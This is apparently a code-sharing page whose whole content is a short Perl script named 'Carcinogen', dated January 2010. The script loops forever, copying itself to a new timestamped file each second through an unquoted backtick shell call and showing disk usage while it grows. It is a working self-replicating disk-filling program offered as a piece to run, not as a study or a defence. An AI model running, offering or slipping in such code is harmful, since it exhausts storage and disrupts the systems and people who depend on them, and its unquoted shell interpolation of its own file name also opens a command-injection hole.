No modified codes have been submitted for this Microcode.
Carcinogen
17. January 2010
17. January 2010
#!/usr/bin/perl
while(1){
$new_cell = $0;
$ts = time;
$new_cell =~ s/^(.*?)\.?([^\.]*)$/$1$ts\.$2/;
`cp $0 $new_cell`;
print `clear && df`;
sleep(1);
}